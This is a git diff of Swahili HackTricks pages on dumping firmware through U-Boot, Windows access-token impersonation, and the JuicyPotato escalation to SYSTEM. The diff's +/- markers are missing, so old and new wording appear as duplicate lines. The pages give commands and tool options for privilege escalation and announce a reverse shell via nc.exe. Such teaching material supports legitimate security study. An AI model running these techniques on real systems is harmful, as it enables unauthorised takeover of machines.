Kufanya hivi kutavuruga <b>uboot</b> kutoka kupakia na kutoa menyu. Inapendekezwa kuelewa amri za <b>uboot</b> na kutumia menyu ya msaada kuorodhesha. Hii inaweza kuwa amri ya `help`. Kwa kuwa wauzaji tofauti hutumia mipangilio tofauti, ni muhimu kuelewa kila moja yao kivyake.
@ -173,19 +187,31 @@ Kawaida, amri ya kudondosha firmware ni:
```
md
```
Ambayo inasimama kwa "dumpu ya kumbukumbu". Hii itadumpu kumbukumbu (Maudhui ya EEPROM) kwenye skrini. Inapendekezwa kurekodi pato la Konzi ya Serial kabla ya kuanza mchakato ili kukamata dumpu ya kumbukumbu.
which stands for "memory dump". Hii itadump kumbukumbu (Maudhui ya EEPROM) kwenye skrini. Inashauriwa kurekodi pato la Konzi ya Serial kabla ya kuanza mchakato ili kukamata kumbukumbu.
Hatimaye, tuondoe data yote isiyohitajika kutoka kwenye faili la logi na uhifadhi faili kama `jina la faili.rom` na tumie binwalk kuchambua maudhui:
Hatimaye, tuondoe data yote isiyohitajika kutoka kwenye faili la logi na uhifadhi faili kama `jina la faili.rom` na tumie binwalk kutoa maudhui:
```
binwalk -e <filename.rom>
```
Hii itaorodhesha maudhui yanayowezekana kutoka kwenye EEPROM kulingana na saini zilizopatikana kwenye faili ya hex.
Ingawa, ni muhimu kuzingatia kwamba sio kila wakati <b>uboot</b> iko wazi hata ikiwa inatumika. Ikiwa Kitufe cha Kuingia hakifanyi chochote, angalia vitufe tofauti kama vile Kitufe cha Nafasi, n.k. Ikiwa bootloader imefungwa na haikatishwi, njia hii haitafanya kazi. Ili kujua kama <b>uboot</b> ndio bootloader wa kifaa, angalia matokeo kwenye Konsoli ya UART wakati wa kuanza kifaa. Inaweza kutaja <b>uboot</b> wakati wa kuanza.
Ingawa, ni muhimu kuzingatia kwamba sio mara zote kwamba <b>uboot</b> imefunguliwa hata ikiwa inatumika. Ikiwa Kitufe cha Kuingia hakifanyi chochote, angalia funguo tofauti kama vile Kitufe cha Nafasi, n.k. Ikiwa bootloader imefungwa na haikatishwi, njia hii haitafanya kazi. Ili kuthibitisha ikiwa <b>uboot</b> ndio bootloader wa kifaa, angalia matokeo kwenye Konsoli ya UART wakati wa kuanza kifaa. Inaweza kutaja <b>uboot</b> wakati wa kuanza.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -193,6 +219,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,21 +2,35 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Vitambulisho vya Kufikia
Kila **mtumiaji aliyeingia** kwenye mfumo **ana vitambulisho vya kufikia na habari za usalama** kwa kikao hicho cha kuingia. Mfumo hutoa kitambulisho cha kufikia wakati mtumiaji anaingia. **Kila mchakato unaoendeshwa** kwa niaba ya mtumiaji **una nakala ya kitambulisho cha kufikia**. Kitambulisho hicho huchambua mtumiaji, vikundi vya mtumiaji, na mamlaka ya mtumiaji. Kitambulisho pia kina SID ya kuingia (Kitambulisho cha Usalama) kinachoidhinisha kikao cha kuingia cha sasa.
Unaweza kuona habari hii ukitekeleza `whoami /all`
Unaweza kuona habari hii kwa kutekeleza `whoami /all`
```
whoami /all
@ -60,23 +74,23 @@ SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
or using _Process Explorer_ from Sysinternals (select process and access"Security" tab):
Au kutumia _Process Explorer_ kutoka Sysinternals (chagua mchakato na ufikie kichupo cha "Usalama"):
![](<../../.gitbook/assets/image (769).png>)
### Msimamizi wa eneo
Wakati msimamizi wa eneo anapoingia, **vitambulisho viwili vya ufikiaji** huanzishwa: Kimoja chenye haki za msimamizi na kingine chenye haki za kawaida. **Kwa chaguo-msingi**, wakati mtumiaji huyu anatekeleza mchakato, kile chenye **haki za kawaida (si msimamizi)** hutumiwa. Wakati mtumiaji huyu anajaribu **kutekeleza** kitu **kama msimamizi** ("Tekeleza kama Msimamizi" kwa mfano) **UAC** itatumika kuomba idhini.\
Wakati msimamizi wa eneo anapoingia, **vitambulisho viwili vya ufikivu** vinajengwa: Kimoja chenye haki za msimamizi na kingine chenye haki za kawaida. **Kwa chaguo-msingi**, wakati mtumiaji huyu anatekeleza mchakato, kile chenye **haki za kawaida** (si msimamizi) **hutumiwa**. Wakati mtumiaji huyu anapojaribu **kutekeleza** kitu **kama msimamizi** ("Tekeleza kama Msimamizi" kwa mfano) **UAC** itatumika kuomba idhini.\
Ikiwa unataka [**kujifunza zaidi kuhusu UAC soma ukurasa huu**](../authentication-credentials-uac-and-efs/#uac)**.**
### Uigizaji wa mtumiaji wa vitambulisho
### Uigizaji wa mtumiaji wa vibali
Ikiwa una **vitambulisho halali vya mtumiaji mwingine**, unaweza **kuunda** kikao kipya cha kuingia kwa kutumia vitambulisho hivyo:
Ikiwa una **vibali halali vya mtumiaji mwingine**, unaweza **kuunda** kikao kipya cha kuingia kwa kutumia vibali hivyo:
```
runas /user:domain\username cmd.exe
```
**Tokeni ya ufikiaji** pia ina **marejeleo** ya vikao vya kuingia ndani ya **LSASS**, hii ni muhimu ikiwa mchakato unahitaji kupata baadhi ya vitu vya mtandao.\
Unaweza kuzindua mchakato ambao **unatumia sifa tofauti za kufikia huduma za mtandao** kwa kutumia:
Unaweza kuzindua mchakato ambao **unatumia sifa tofauti kwa ajili ya kupata huduma za mtandao** kwa kutumia:
```
runas /user:domain\username /netonly cmd.exe
```
@ -86,16 +100,16 @@ Hii ni muhimu ikiwa una sifa muhimu za kupata vitu kwenye mtandao lakini sifa hi
Kuna aina mbili za vyeti zilizopo:
* **Cheti Kuu**: Hufanya kama uwakilishi wa sifa za usalama za mchakato. Uundaji na uunganishaji wa vyeti vya msingi na michakato ni vitendo vinavyohitaji mamlaka ya juu, kusisitiza kanuni ya kutenganisha mamlaka. Kwa kawaida, huduma ya uthibitishaji inahusika na uundaji wa cheti, wakati huduma ya kuingia inashughulikia uhusishaji wake na kabati la mfumo wa mtumiaji. Ni muhimu kutambua kwamba michakato huirithi cheti kuu cha mchakato wao wa mzazi wakati wa uundaji.
* **Cheti cha Uigizaji**: Humpa programu ya seva uwezo wa kuchukua kitambulisho cha mteja kwa muda ili kupata vitu salama. Mfumo huu umegawanywa katika viwango vinne vya uendeshaji:
* **Anonim**: Hutoa ufikiaji wa seva kama wa mtumiaji asiyejulikana.
* **Utambuzi**: Inaruhusu seva kuthibitisha kitambulisho cha mteja bila kutumia kwa ufikiaji wa vitu.
* **Cheti Kuu**: Hufanya kama uwakilishi wa sifa za usalama za mchakato. Uundaji na uunganishaji wa vyeti vya msingi na michakato ni vitendo vinavyohitaji mamlaka ya juu, ikisisitiza kanuni ya kutenganisha mamlaka. Kwa kawaida, huduma ya uthibitishaji inahusika na uundaji wa cheti, wakati huduma ya kuingia inashughulikia uhusishaji wake na kabati la mfumo wa mtumiaji. Ni muhimu kutambua kwamba michakato huirithi cheti kuu cha mchakato wao wa mzazi wakati wa uundaji.
* **Cheti cha Uigizaji**: Humpa programu ya seva uwezo wa kuchukua kitambulisho cha mteja kwa muda kwa kupata vitu salama. Mfumo huu umegawanywa katika viwango vinne vya uendeshaji:
* **Anonim**: Humpa seva ufikiaji kama wa mtumiaji asiyejulikana.
* **Utambuzi**: Inaruhusu seva kuthibitisha kitambulisho cha mteja bila kutumia kwa upatikanaji wa vitu.
* **Uigizaji**: Inawezesha seva kufanya kazi chini ya kitambulisho cha mteja.
* **Uteuzi**: Kama Uigizaji lakini inajumuisha uwezo wa kupanua dhana hii ya kitambulisho kwa mifumo ya mbali ambayo seva inashirikiana nayo, ikisimamia uhifadhi wa sifa.
* **Uteuzi**: Kama Uigizaji lakini inajumuisha uwezo wa kuendeleza dhana hii ya kitambulisho kwa mifumo ya mbali ambayo seva inashirikiana nayo, ikisimamia uhifadhi wa sifa.
#### Uigize Vyeti
#### Uigizaji wa Vyeti
Kwa kutumia moduli ya _**incognito**_ ya metasploit ikiwa una mamlaka za kutosha unaweza kwa urahisi **kuorodhesha** na **kuigiza** vyeti vingine **.** Hii inaweza kuwa muhimu kufanya **vitendo kana kwamba wewe ni mtumiaji mwingine**. Unaweza pia **kupandisha vyeo** kwa kutumia mbinu hii.
Kwa kutumia moduli ya _**incognito**_ ya metasploit ikiwa una mamlaka za kutosha unaweza kwa urahisi **kuorodhesha** na **kuigiza** vyeti vingine **vyeti**. Hii inaweza kuwa muhimu kufanya **vitendo kana kwamba wewe ni mtumiaji mwingine**. Pia unaweza **kupandisha vyeo** kwa kutumia mbinu hii.
### Vyeo vya Mamlaka
@ -105,8 +119,33 @@ Jifunze ni **vyeo vya mamlaka** vipi vinaweza kutumiwa vibaya kwa ajili ya kupan
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
{% endcontent-ref %}
Tazama [**vyeo vyote vya mamlaka vinavyowezekana na baadhi ya ufafanuzi kwenye ukurasa huu wa nje**](https://github.com/gtworek/Priv2Admin).
Angalia [**vyeo vyote vya mamlaka vinavyowezekana na baadhi ya ufafanuzi kwenye ukurasa huu wa nje**](https://github.com/gtworek/Priv2Admin).
## Marejeo
Jifunze zaidi kuhusu vyeti katika mafunzo haya: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) na [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikitangazwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -2,9 +2,9 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -12,6 +12,20 @@
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato haitafanyi kazi** kwenye Windows Server 2019 na Windows 10 toleo la 1809 na baadaye. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) inaweza kutumika kwa **kutumia mamlaka sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`**. _**Angalia:**_
{% endhint %}
@ -32,11 +46,11 @@ _To leo tamu la_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotato
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) na [toleo lake](https://github.com/decoder-it/lonelypotato) linatumia mnyororo wa kupandisha mamlaka kulingana na [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [huduma](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) ikiwa na msikilizaji wa MiTM kwenye `127.0.0.1:6666` na unapokuwa na mamlaka ya `SeImpersonate` au `SeAssignPrimaryToken`. Wakati wa ukaguzi wa ujenzi wa Windows tuligundua usanidi ambapo `BITS` ulizuiliwa kwa makusudi na bandari `6666` ilichukuliwa.
Tuliamua kuwezesha [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Sema hello kwa Juicy Potato**.
Tuliamua kuwezesha [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Sema habari njema kwa Juicy Potato**.
> Kwa nadharia, angalia [Rotten Potato - Kupandisha Mamlaka kutoka kwa Akaunti za Huduma hadi SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) na fuata mnyororo wa viungo na marejeo.
Tuligundua kwamba, zaidi ya `BITS` kuna seva za COM kadhaa tunaweza kutumia vibaya. Wanahitaji tu:
Tuligundua kwamba, zaidi ya `BITS` kuna seva kadhaa za COM tunaweza kutumia vibaya. Wanahitaji tu:
1. iweze kuanzishwa na mtumiaji wa sasa, kawaida "mtumiaji wa huduma" ambaye ana mamlaka ya udanganyifu
2. tekeleza kiolesura cha `IMarshal`
@ -49,7 +63,7 @@ Baada ya majaribio tulipata na kujaribu orodha ndefu ya [CLSID's za kuvutia](htt
JuicyPotato inakuruhusu:
* **Lengo la CLSID** _chagua CLSID yoyote unayotaka._ [_Hapa_](http://ohpe.it/juicy-potato/CLSID/) _unaweza kupata orodha iliyopangwa kulingana na OS._
* **Bandari ya Kusikiliza COM** _fafanua bandari ya kusikiliza COM unayopendelea (badala ya 6666 iliyowekwa kimarshall)_
* **Bandari ya Kusikiliza COM** _fafanua bandari ya kusikiliza COM unayopendelea (badala ya 6666 iliyowekwa kiotomatiki)_
* **Anwani ya IP ya Kusikiliza COM** _funga seva kwenye IP yoyote_
* **Hali ya Uumbaji wa Mchakato** _kulingana na mamlaka ya mtumiaji aliyejifanya unaweza kuchagua kutoka:_
* `CreateProcessWithToken` (inahitaji `SeImpersonate`)
@ -60,8 +74,7 @@ JuicyPotato inakuruhusu:
* **Anwani ya Seva ya RPC** _kwa njia ya siri unaweza kuthibitisha kwa seva ya RPC ya nje_
* **Bandari ya Seva ya RPC** _inayofaa ikiwa unataka kuthibitisha kwa seva ya nje na firewall inazuia bandari `135`…_
* **Hali ya MAJARIBIO** _hasa kwa madhumuni ya majaribio, yaani kujaribu CLSIDs. Inaunda DCOM na kuchapisha mtumiaji wa token. Angalia_ [_hapa kwa majaribio_](http://ohpe.it/juicy-potato/Test/)
### Matumizi <a href="#usage" id="usage"></a>
### Matumizi <a href="#matumizi" id="matumizi"></a>
```
T:\>JuicyPotato.exe
JuicyPotato v0.1
@ -86,13 +99,13 @@ Ikiwa mtumiaji ana ruhusa za `SeImpersonate` au `SeAssignPrimaryToken` basi wewe
Ni karibu haiwezekani kuzuia matumizi mabaya ya seva zote hizi za COM. Unaweza kufikiria kuhusu kubadilisha ruhusa za vitu hivi kupitia `DCOMCNFG` lakini kila la heri, hii itakuwa changamoto.
Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendeshwa chini ya akaunti za `* SERVICE`. Kusitisha `DCOM` bila shaka itazuia shambulio hili lakini inaweza kuwa na athari kubwa kwa mfumo wa uendeshaji uliopo.
Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendeshwa chini ya akaunti za `* SERVICE`. Kusitisha `DCOM` bila shaka kungezuia shambulio hili lakini kunaweza kuwa na athari kubwa kwa OS inayohusika.
Kutoka: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
## Mifano
Tafadhali tembelea [ukurasa huu](https://ohpe.it/juicy-potato/CLSID/) kwa orodha ya CLSIDs za kujaribu.
Tahadhari: Tembelea [ukurasa huu](https://ohpe.it/juicy-potato/CLSID/) kwa orodha ya CLSIDs za kujaribu.
### Pata kabati la kurudi la nc.exe
```
@ -121,7 +134,7 @@ c:\Users\Public>
## Matatizo ya CLSID
Maranyingi, CLSID ya msingi ambayo JuicyPotato hutumia **haifanyi kazi** na shambulio linashindwa. Kawaida, inachukua majaribio mengi kupata CLSID **inayofanya kazi**. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji fulani, unapaswa kutembelea ukurasa huu:
Maranyingi, CLSID ya msingi ambayo JuicyPotato hutumia **haifanyi kazi** na jaribio linashindwa. Kawaida, inachukua majaribio mengi kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji fulani, unapaswa kutembelea ukurasa huu:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
@ -129,7 +142,7 @@ Maranyingi, CLSID ya msingi ambayo JuicyPotato hutumia **haifanyi kazi** na sham
Kwanza, utahitaji baadhi ya programu za kutekeleza mbali na juicypotato.exe.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na upakie kwenye kikao chako cha PS, na pakua na tekeleza [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSIDs za kujaribu.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na upakie kwenye kikao chako cha PS, na pakua na tekeleza [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSIDs inayoweza kujaribiwa.
Kisha pakua [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(badilisha njia ya orodha ya CLSID na kwa kutekelezeka kwa juicypotato) na tekeleza. Itaanza kujaribu kila CLSID, na **wakati nambari ya bandari inabadilika, itamaanisha kwamba CLSID imefanya kazi**.
@ -139,14 +152,26 @@ Kisha pakua [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwenye:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Je, unafanya kazi katika kampuni ya **usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -2,23 +2,37 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
